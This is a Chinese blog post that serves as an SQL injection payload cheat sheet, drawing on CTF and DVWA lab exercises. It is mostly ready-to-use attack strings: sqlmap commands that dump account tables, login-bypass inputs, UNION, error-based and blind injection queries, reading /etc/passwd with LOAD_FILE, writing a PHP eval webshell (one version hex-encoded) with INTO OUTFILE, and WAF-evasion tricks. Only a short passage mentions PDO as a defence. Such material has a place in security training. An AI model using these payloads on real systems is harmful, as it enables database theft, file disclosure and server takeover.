sql注入

最新推荐文章于 2024-09-24 08:11:59 发布
最新推荐文章于 2024-09-24 08:11:59 发布
阅读量158 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35490522/article/details/113484704
版权

一次sqlmap注入点并且dump出账号密码全程
判断注入点:sqlmap.py -u “存在注入url”

爆出所有数据库名字:sqlmap.py -u “存在注入url” --dbs

查看当前使用账号:sqlmap.py -u “存在注入url” --current-user

1、查看当前数据库:sqlmap.py -u “存在注入url” --current-db
2、列出数据库中所有表:sqlmap.py -u “存在注入url”-D “当前数据库名” --tables。
解释说明:-D是指定数据库名称。
3、列出数据库中的表中的字段:sqlmap.py -u “存在注入url” -D “当前数据库名” -T “数据库中的随意一张表(选取表需要自己判断)” --columns。
4、列出数据库中的表中的字段:sqlmap.py -u “存在注入url” -D “当前数据库名” -T “数据库中的随意一张表(选取表需要自己判断)” -C “当前表的字段” --dump。


万能密码1:
$sql="select user from ctf where (user='".$user."') and (pw='".$pass."')";
需变形为
select user from ctf where user = admin -- and pw = zxxxxx;
注入式user=admin')-- -$pass=123456
万能密码2:查看过滤那些关键字
select,or,union,/,|,%7c,‘,“,(),=
sql注入:username='='&password='='
拼成:string sql = select * from users where username = ''='' and password = ''='';
反斜杠注入:
原式:'SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';'sql注入:?username=&password= or 1%23
拼成:SELECT * FROM users WHERE name='\' AND pass=' or 1 #'

union绕过型
原式:select pw from ctf where user='$user'
sql注入:Username=' union select '9b17d9b51d0d090939ca6ff11c7d8c1b&Password=jedi
拼成:select password from users where username='' union select 'jedi';




#一般都要在前面加上'

#注入  1' or '1'='1
select username, password from user where username='1' or '1'='1' and password ='1' or '1'='1';
#原sql存在注入,利用单引号问题进行布尔注入
'select username, password from tb_admin where username='+ User +'and password =' + Pass;
SELECT *from `user` where True; '1' or '1'='1'
#查库名http://localhost/Less-1/?id=1' and (select group_concat(SCHEMA_NAME) from information_schema.schemata);--+
select group_concat(SCHEMA_NAME) from information_schema.schemata;
#爆所有用户名
select group_concat(username) from test.`user`;
#爆当前数据库表名
select group_concat(table_name) from information_schema.tables where table_schema=database();
# 表中有主码约束,非空约束等完整性约束条件的情况下 爆表名
select group_concat(table_name) from information_schema.table_constraints where table_schema=database();


#爆字段名
select group_concat(column_name) from information_schema.columns where table_name='user';
select group_concat(column_name) from information_schema.columns where table_name=0x7573657273;#进行十六进制编码
#爆字段内容
select username from `user`



#文件读取
SELECT LOAD_FILE('/etc/passwd')#可以进行十六进制编码
#写入文件,文件已存在,则报错。
select 'hello' into outfile '/www/server/tomcatwebsite/';#方法一
select '<?php @eval($_POST[1]);?>' into outfile '/www/server/tomcatwebsite/1.txt';
select 'hello' into dumpfile '/www/server/tomcatwebsite/';
#查看方式,权限什么   secure_file_priv 的值为 null ,表示限制 mysqld 不允许导入|导出, secure_file_priv 的值为/tmp/ ,表示限制 mysqld 的导入|导出只能发生在/tmp/目录下
#当 secure_file_priv 的值为/,表示限制 mysqld 的导入|导出的目录为所在的整个磁盘。当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制
show global variables like '%secure%';
#查主键
select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2))







-- 
-- 
-- 注释一行
-- 
-- /**/
-- 
-- 行内注释、多行注释
-- 
-- --
-- 
-- 注释一行
-- 
-- ;%00
-- 
-- 空字节注释
-- 
-- `
-- 
-- 反引号(只能在句末使用)
-- 
-- 字符串连接
-- 
-- select 'a' 'd' 'min';
-- 
-- select concat('a','d','min');
-- 
-- select concat_ws('_','a','d','min');
-- 
-- select group_concat('a','d','min');
-- 
-- concat_ws 和 concat的区别:
-- 
-- concat_ws 全称是 concat with separator,可以添加连字符
-- 
-- concat 函数,如果有一个数值是 null,则返回值为 null,而 concat_ws 不会这样
-- 
-- 0x03、SQL Injection(DVWA)
-- 
-- 3.1 Low Security Level
-- 
-- # 判断是否为注入
-- 
-- ?id=1' or '1'='1
-- 
-- ?id=1' or '1'='2
-- 
-- # 判断字段长度(2 正常,3 异常)
-- 
-- ?id=1' order by 2 --
-- 
-- ?id=1' order by 3 --
-- 
-- # 确定回显点
-- 
-- ?id=1' union select 111,222 --
-- 
-- # 用户名和数据库名称
-- 
-- ?id=1' union select user(),database() --
-- 
-- -- output:admin@localhost、dvwa
-- 
-- # 查看当前用户和 mysql 版本
-- 
-- ?id=1' union select current_user(),version() --
-- 
-- -- output:First name: admin@%、 5.5.47-0ubuntu0.14.04.1
-- 
-- # 爆表名
-- 
-- ?id=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema =database() --
-- 
-- -- output:guestbook,users
-- 
-- # 爆列名(两种办法,加引号或者十六进制编码)
-- 
-- ?id=1' union select 1,group_concat(column_name) from information_schema.columns where table_name =0x7573657273 --
-- 
-- ?id=1' union select 1,group_concat(column_name) from information_schema.columns where table_name ='users' --
-- 
-- -- output:user_id,first_name,last_name,user,password,avatar,last_login,failed_login
-- 
-- # 爆字段名
-- 
-- ?id=1' union select group_concat(user_id,first_name,last_name),group_concat(password) from users --
-- 
-- ?id=1' union select null,concat_ws(char(32,58,32),user,password) from users --
-- 
-- ?id=1' union select user,password from users --
-- 
-- -- output:admin/5f4dcc3b5aa765d61d8327deb882cf99
-- 
-- # 读文件
-- 
-- ?id=1' union select 1,load_file('//tmp//key') --
-- 
-- # 写文件()
-- 
-- ?id=1' and '1'='2' union select null,'hello' into outfile '/tmp/test01' --
-- 
-- ?id=999' union select null,'hello' into outfile '/tmp/test02' --
-- 
-- ?id=999' union select null,'<?php @eval($_POST["gg"]); ?>' into outfile '/tmp/test03' --
-- 
-- ?id=999' union select 1,0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E into outfile '//tmp//test04' --
-- 
-- 3.2 Medium Security Level
-- 
-- 使用了 mysqli_real_escape_string 函数对特殊字符进行转义,同时前端页面设置了下拉选择表单,希望以此来控制用户的输入。
-- 
-- 此处是数字型注入,所以和特殊符号过滤关系不大,使用 hackbar 进行 POST 即可。
-- 
-- # 判断注入点
-- 
-- id=1 and 1=1 &Submit=Submit
-- 
-- id=1 and 1=2 &Submit=Submit
-- 
-- # 爆数据
-- 
-- id=1 union select user,password from users&Submit=Submit
-- 
-- 3.3 High Secuirty Level
-- 
-- 此处加了个 limit 1 来限制输出,但是可以直接注释掉,解法与 Low Security Level 相同。
-- 
-- 3.4 Impossible Secuity Level
-- 
-- 采用了 PDO 技术,划清了代码与数据的界限,有效防御 SQL 注入,同时只有返回的查询结果数量为一时,才会成功输出,这样就有效预防了”脱裤”,Anti-CSRFtoken 机制的加入了进一步提高了安全性。
-- 
-- 3.5 sqlmap 一把梭
-- 
-- 利用 sqlmap 工具进行注入
-- 
-- # 爆所有数据库
-- 
-- sqlmap -r 1.txt --dbs
-- 
-- -- output:dvwa、information_schema、mysql、performance_schema
-- 
-- # 爆表名
-- 
-- sqlmap -r 1.txt -D dvwa --tables
-- 
-- -- output:guestbook、users
-- 
-- # 爆字段名
-- 
-- sqlmap -r 1.txt -D dvwa -T users --columns
-- 
-- -- output:user、password、first_name、last_login、last_name……
-- 
-- # 爆字段内容
-- 
-- sqlmap -r 1.txt -D dvwa -T users -C user,password --dump
-- 
-- -- output:得到账号和 MD5 hash 后的密码
-- 
-- 0x04、SQL 注入类型
-- 
-- union 注入
-- 
-- 参考 dvwa 的注入过程即可。
-- 
-- 报错注入
-- 
-- 可以通过 floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection 等方法来进行注入。
-- 
-- floor() 报错注入【首选】
-- 
-- 无长度限制,首选!
-- 
-- # floor() 报错 1
-- 
-- select count(*),concat(0x7e,(select version()),0x7e,floor(rand(0)*2))a from information_schema.tables group by a;
-- 
-- # floor() 报错 2,和上面的等价
-- 
-- select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2));
-- 
-- # 数据库版本
-- 
-- and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
-- 
-- # 当前用户
-- 
-- and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
-- 
-- # 连接数据库
-- 
-- and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
-- 
-- # 爆数据库
-- 
-- and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
-- 
-- # 爆表
-- 
-- and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
-- 
-- # 爆字段
-- 
-- and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x696e736572745f666c6167 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
-- 
-- # 爆内容
-- 
-- and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,字段名,0x23) FROM 表名 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
-- 
-- 其中的 rand((0)*2)、floor()、group by 函数缺一不可.
-- 
-- extractvalue() 报错注入
-- 
-- ExtractValue(xml_str,Xpath) 函数,使用 Xpath 表示从 XML 格式的字符串中提取一个值
-- 
-- 函数中任意一个参数为 NULL,返回值都是 NULL
-- 
-- 构造了不符合规定的 Xpath, MySQL 就会报语法错误,并显示 XPath 的内容.
-- 
-- 有长度限制,最长32位
-- 
-- # 内置函数 爆当前用户、版本等等
-- 
-- and extractvalue(1,concat(0x7e,user(),0x7e))
-- 
-- # 爆数据库
-- 
-- and extractvalue(1,concat(0x7e,database(),0x7e))
-- 
-- # 爆表
-- 
-- and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,1 ),0x7e))
-- 
-- # 爆字段,表名可以改成十六进制
-- 
-- and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='表名'),0x7e))
-- 
-- # 爆内容
-- 
-- and extractvalue(1,concat(0x7e,(select group_concat(字段名) from 表名 ),0x7e))
-- 
-- updatexml() 报错
-- 
-- updatexml(xml,xpath,new_xml)
-- 
-- 使用 nex_xml 根据 xpath 来替换 xml 字符串中特定的值
-- 
-- 有长度限制,最长32位
-- 
-- # 爆版本、用户、等等内置函数均可
-- 
-- and updatexml(1,concat(0x7e,version(),0x7e),1)
-- 
-- # 爆数据库
-- 
-- and updatexml(1,concat(0x7e,database(),0x7e),1)
-- 
-- # 爆表
-- 
-- and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1 ),0x7e),1)
-- 
-- # 爆字段
-- 
-- and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() limit 0,1 ),0x7e),1)
-- 
-- # 爆内容
-- 
-- and updatexml(1,concat(0x7e,(select * from 表名 limit 0,1 ),0x7e),1)
-- 
-- name_const() 报错
-- 
-- name_const(name,value)
-- 
-- 传入的参数必须是常量,否则就会报错
-- 
-- 测试时,只有 version() 好用,其他不能用
-- 
-- # 报错
-- 
-- select name_const(database(),1);
-- 
-- # 正常
-- 
-- select name_const(version(),1);
-- 
-- # 报错注入
-- 
-- select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))a;
-- 
-- exp 报错
-- 
-- # 爆用户
-- 
-- select exp(~(select * from(select user())x));
-- 
-- # 爆表名
-- 
-- select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x));
-- 
-- # 爆列名
-- 
-- select exp(~(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x));
-- 
-- # 爆数据:
-- 
-- select exp(~ (select*from(select concat_ws(':',id, username, password) from users limit 0,1)x));
-- 
-- 十种 MySQL 报错注入
-- 
-- 摘自《代码审计:企业级Web代码安全架构》一书
-- 
-- 1.floor()
-- 
-- select * from users where user_id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
-- 
-- 2.extractvalue()
-- 
-- select * from users where user_id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
-- 
-- 3.updatexml()
-- 
-- select * from users where user_id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
-- 
-- 4.geometrycollection()
-- 
-- select * from users where user_id=1 and geometrycollection((select * from(select * from(select user())a)b));
-- 
-- 5.multipoint()
-- 
-- select * from users where user_id=1 and multipoint((select * from(select * from(select user())a)b));
-- 
-- 6.polygon()
-- 
-- select * from users where user_id=1 and polygon((select * from(select * from(select user())a)b));
-- 
-- 7.multipolygon()
-- 
-- select * from users where user_id=1 and multipolygon((select * from(select * from(select user())a)b));
-- 
-- 8.linestring()
-- 
-- select * from users where user_id=1 and linestring((select * from(select * from(select user())a)b));
-- 
-- 9.multilinestring()
-- 
-- select * from users where user_id=1 and multilinestring((select * from(select * from(select user())a)b));
-- 
-- 10.exp()
-- 
-- select * from users where user_id=1 and exp(~(select * from(select user())a));
-- 
-- BOOL盲注
-- 
-- 盲注的时候一定注意,MySQL4 之后大小写不敏感,可使用 binary() 函数使大小写敏感。
-- 
-- 构造 bool 条件
-- 
-- # 正常情况
-- 
-- 'or bool#
-- 
-- true'and bool#
-- 
-- # 不使用空格、注释
-- 
-- 'or(bool)='1
-- 
-- true'and(bool)='1
-- 
-- # 不使用or、and、注释
-- 
-- '^!(bool)='1
-- 
-- '=(bool)='
-- 
-- '||(bool)='1
-- 
-- true'%26%26(bool)='1
-- 
-- '=if((bool),1,0)='0
-- 
-- # 不使用等号、空格、注释
-- 
-- 'or(bool)<>'0
-- 
-- 'or((bool)in(1))or'0
-- 
-- # 其他
-- 
-- or (case when (bool) then 1 else 0 end)
-- 
-- 构造逻辑判断
-- 
-- 常用的函数如下,可用 ASCII()、ORD()和CHAR() 函数做辅助。
-- 
-- # 常用的函数
-- 
-- select left(user(),1)='r';
-- 
-- select right(user(),1)='r';
-- 
-- select substr(user(),1,1)='r';
-- 
-- select substring(user(),1,1)='r';
-- 
-- select mid(user(),1,1)='r';
-- 
-- # 不使用逗号
-- 
-- user() regexp '^[a-z]'
-- 
-- select user() like "root%";
-- 
-- select POSITION('root' in user());
-- 
-- select mid(user() from 1 for 1)='r';
-- 
-- select mid(user() from 1) like "ro%";
-- 
-- 延时盲注
-- 
-- 几个延时的语句
-- 
-- select sleep(3);
-- 
-- select if((1=1),sleep(3),0);
-- 
-- select (case when (1=1) then sleep(3) else 0 end);
-- 
-- select BENCHMARK(100000,MD5(1)) or sleep(3);
-- 
-- Insert & Update注入
-- 
-- # insert 报错注入
-- 
-- mysql> insert into guestbook values(2,'test2',extractvalue(1,concat(0x7e,user(),0x7e)));
-- 
-- ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'
-- 
-- # update 报错注入
-- 
-- mysql> update guestbook set name='gp' where comment_id=1 and extractvalue(1,concat(0x7e,user(),0x7e));
-- 
-- ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'
-- 
-- # insert 延时盲注
-- 
-- mysql> insert into guestbook values(3,'test2',sleep(3));
-- 
-- Query OK, 1 row affected (3.03 sec)
-- 
-- order by 后的注入
-- 
-- 此类型的注入,无法使用 PDO 的方式防范!
-- 
-- # 报错注入
-- 
-- mysql> select * from users order by 1 and extractvalue(1, concat(0x7e, (select @@version),0x7e));
-- 
-- ERROR 1105 (HY000): XPATH syntax error: '~5.5.47-0ubuntu0.14.04.1~'
-- 
-- # 布尔注入
-- 
-- select * from users order by IF(0,1,(select 1 union select 2));
-- 
-- select * from users order by IF(1,1,(select 1 union select 2));
-- 
-- 0x05、宽字节注入
-- 
-- 基本信息
-- 
-- SQL 注入中有一种注入方式叫做宽字节注入,是因为国内常使用 GBK 编码造成的,可以绕过 addslashes 函数对特殊字符进行的转义。
-- 
-- 反斜杠的十六进制是%5c,单引号的十六进制是 %27,输入 %bf%27 时,因为要转义单引号,所以就成了 %bf%5c%27,而在 GBK 编码中,%bf%5c 代表一个宽字符 缞(cuī),%bf 可以替代为 %81 - %fe 中间的任何字符。
-- 
-- 注:缞绖(cuī dié),在古代缞和绖是就是丧带和丧服,缞绖合在一起说就指整套丧服。
-- 
-- 注入方法
-- 
-- 宽字节注入和普通的注入很像,payload 如下:
-- 
-- # 普通的注入
-- 
-- ?id=1' union select 1,2,3 #
-- 
-- # 宽字节注入
-- 
-- ?id=1%bf%27 union select 1,2,3 #
-- 
-- # 剩下的 payload 就和普通注入一模一样了
-- 
-- 0x06、HTTP 参数污染
-- 
-- 基本信息
-- 
-- 先看一个例子,
-- 
-- # 一个 id,两个 value
-- 
-- http://www.xxxx.com/search.php?id=1&id=2
-- 
-- 不同的网站,对这个 URL 的理解不一样,百度认为 id=1,雅虎认为 id=2,谷歌认为 id=1,2,如果服务器把两个 value 都留了下来,那么就可能存在问题。
-- 
-- Web服务器
-- 
-- 参数获取函数
-- 
-- 获取到的参数
-- 
-- PHP/Apache
-- 
-- $_GET(“par”)
-- 
-- Last
-- 
-- JSP/Tomcat
-- 
-- Request.getParameter(“par”)
-- 
-- First
-- 
-- Perl(CGI)/Apache
-- 
-- Param(“par”)
-- 
-- First
-- 
-- Python/Apache
-- 
-- getvalue(“par”)
-- 
-- All (List)
-- 
-- ASP/IIS
-- 
-- Request.QueryString(“par”)
-- 
-- All (comma-delimited string)
-- 
-- 绕过 waf
-- 
-- # 正常的注入
-- 
-- show_user.aspx?id=5;select 1,2,3 from users where id=1--
-- 
-- # 使用 HPP 的注入,没有了 select xxx from xxx 特征
-- 
-- show_user.aspx?id=5;select 1&id=2&id=3 from users where id=1--
-- 
-- 0x07、绕过技巧
-- 
-- # 大小写绕过
-- 
-- selEct * fRom users;
-- 
-- # 重写绕过
-- 
-- seleselectct * frfromom users;
-- 
-- # 拼写绕过
-- 
-- 参考 0x02 的字符串连接
-- 
-- # 编码绕过,以 admin 为例
-- 
-- select CHAR(97, 100, 109, 105, 110);
-- 
-- # 十六进制编码
-- 
-- SELECT FROM Users WHERE username = 0x61646D696E
--

参考CTF: https://blog.csdn.net/huanghelouzi/article/details/82999684?utm_medium=distribute.pc_relevant.none-task-blog-OPENSEARCH-16.baidujs&depth_1-utm_source=distribute.pc_relevant.none-task-blog-OPENSEARCH-16.baidujs

hooking_parse
关注
openSearch支持mysql版本_OpenSearch 使用二三事-阿里云开发者社区
weixin_42168555的博客
01-28 238
先交代下我们的使用场景。我们是把一张分库分表的逻辑表导入了 OpenSearch,建立了相关索引,供后台管理界面查询使用。最近在使用的过程中遇到了几个问题。记之。查询的数据最多只有 5000 条我们有一个数据导出功能,当导出的数据超过 5000 条时,导出的表格里就只有 5000 条。我们使用的是 search 接口分页查,看日志发现当 startHit 到 5000 左右就返回失败了。咨询了下得...
集成向量数据库对比:MyScale vs. PostgreSQL & OpenSearch
MyScale_VectorDB的博客
12-19 3365
MyScale 是一个提供完整 SQL 支持的集成向量数据库,PostgreSQL 和 OpenSearch 最近都添加了向量相似性搜索功能的传统数据库。本文将对 MyScale 、PostgreSQL 和 OpenSearch 进行比较。
阿里开放搜索opensearch+java+mybatis-plus快速入门
fish_detective的博客
03-30 2854
智能开放搜索OpenSearch是基于阿里巴巴自主研发的大规模分布式搜索引擎搭建的一站式商用智能搜索平台,目前为包括淘宝、天猫、菜鸟在内的阿里集团核心搜索业务提供中台服务支持。经过多年的行业搜索经验沉淀、双11大促流量冲击,智能开放搜索OpenSearch打磨出一套高性能、高时效、高可用、强稳定搜索全家桶服务,包括行业算法版高性能检索版向量检索版召回引擎版四类商品版本,以满足各行各业的搜索需求。
OpenSearch SQL 使用与安装教程
gitblog_00013的博客
09-24 338
OpenSearch SQL 使用与安装教程 sql Query your data using familiar SQL or intuitive Piped Processing Language (PPL) 项目地址: ht...
SQL 中OPENQUERY的使用
micheal3000 的专栏
10-19 5815
OpenQuery 是SQL Server用来与其他Server交互的一种技术,通过OpenQuery,SQL Server 可以直接访问其他数据库资源。而其他数据库在OpenQuery 表达式中是以Linked Server 存在的。1. 使用sp_linkedservers 可以找到当前数据库的所有linked server.
SQL注入原理以及Spring Boot如何防止SQL注入(含详细示例代码)
12-29
SQL注入是一种严重的安全威胁,它允许攻击者通过在应用程序的输入字段中插入恶意SQL代码来执行未经授权的数据库操作。攻击者通常寻找没有适当验证和过滤的用户输入,然后利用这些漏洞来构造能改变原始SQL语句意图的...
DB2数据库SQL注入手册1
08-08
DB2数据库SQL注入手册 DB2数据库SQL注入手册是指在使用DB2数据库时,如何检测和防止SQL注入攻击的一份指南。SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在输入字段中 inject恶意SQL代码来访问或控制...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
SQL注入漏洞全接触.ppt
11-15
"SQL注入漏洞全接触"知识点总结 一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及...
opensearch 实战记录 细节太多了
qq_34550787的博客
11-05 2514
不用不知道一用细节太多了打算全部分享出来 =======2019-11-05等有时间更新欢迎讨论 更新一波===2020 -01-21 1可以建立单个索引,也可以组合索引.(目前默认组合索引个数最多是4个,每个组合索引最多8个字段),能建立索引的字段类型只能说TEXTor SHOT TEXT. 这里有个地方需要注意:最好设置一个索引名称为default,原因如下(控...
OpenSearch 使用二三事
weixin_33962923的博客
06-20 1302
先交代下我们的使用场景。我们是把一张分库分表的逻辑表导入了 OpenSearch,建立了相关索引,供后台管理界面查询使用。最近在使用的过程中遇到了几个问题。记之。 查询的数据最多只有 5000 条 我们有一个数据导出功能,当导出的数据超过 5000 条时,导出的表格里就只有 5000 条。我们使用的是 search 接口分页查,看日志发现当 startH...
OpenSearch最新功能介绍
xt1233的博客
10-29 778
**摘要:**阿里云开放搜索(OpenSearch)是一款结构化数据搜索托管服务,其能够提供简单、高效、稳定、低成本和可扩展的搜索解决方案。OpenSearch以平台服务化的形式,将专业搜索技术简单化、低门槛化和低成本化,让搜索引擎技术不再成为客户的业务瓶颈,以低成本实现产品搜索功能并快速迭代。本文将为大家介绍OpenSearch的最新推出的电商查询语义理解和搜索算法平台两个新功能。 本文整理自直...
优化OpenSearch的搜索结果
农场老马的专栏
09-26 5370
前面介绍了OpenSearch的基本使用(使用OpenSearch为应用提供搜索功能),一个小型的搜索服务很容易搭建。但具体应用到某个业务时,可能我们对默认的搜索结果并不满意,这里介绍下OpenSearch在搜索结果的调优方面提供的方法。调优入口使用OpenSearch时,要影响搜索结果,可以在两个地方下功夫。查询一条OpenSearch查询语句可以包含多种形式的子句,除了最核心的必选query子句
opensearch和mysql,如何将ElasticSearch与MySQL集成?
weixin_39707941的博客
02-28 208
In one of my project, I am planning to use ElasticSearch with MySQL.I have successfully installed ElasticSearch. I am able to manage index in ES separately. but I don't know how to implement the same ...
【阿里云opensearch】如何在opensearch配置一对多的数据结构
猫球球的博客
08-19 2039
阿里云的opensearch服务本身是只支持主表N对1的结构,但是并不支持1对N的结构。换而言之就是多条主表记录可以对应单条辅表记录,但是如果一条主表记录对应多条主表记录就会出问题。比如多个商品可以对应同一个品牌,那么我们就必须用商品来做主表,而不能用品牌来做主表。如果一条物品有进仓和出仓两条记录,我们是不能用进出仓记录来做附表的,但如果此时又有这样的需求,那么我们应该怎么办呢? 在我们的工作中...
search搜索的sql语句
计算机技术大学习
03-04 1711
华为OD模型资源22份
10-17
华为OD模型资源22份,资源列表: 组织发展与变革19页.pptx 华为BLM模型67页.ppt 华为组织变革认知和启示14页.docx 企业管理创新与组织变革110页.ppt 企业文化建设模型13页.ppt BLM模型90页.ppt 组织变革与管理38页.pptx 公司组织机构图10页.docx 如何设计出有效的组织架构29页.pptx 组织设计与发展10页.pptx 【模板】企业组织架构图PPT模板(漂亮实用)22P.ppt 公司组织机构调整方案9页.doc 丹尼森组织文化模型.xlsx 杜邦公司组织变革案例分析26页.ppt 组织文化评估工具(奎因模型)28页.pptx 公司与组织架构设计53页.ppt 【模板】企业组织架构图PPT模板15页.pptx 华为变革及流程管理框架33页.pptx 组织发展(OD)4页.pptx 组织发展评估模型48页.ppt 绩效管理(组织绩效管理)46页.ppt 组织变革的案例14页.ppt
13.jpg
最新发布
10-17
13
SQL注入攻防深度解析
"SQL注入天书是一份详尽介绍SQL注入技术的资料,涵盖了从基础到高级的ASP注入方法和技巧,适合不同水平的读者学习。" SQL注入是一种常见的网络安全漏洞,发生在Web应用程序未能充分验证和清理用户输入时。当用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值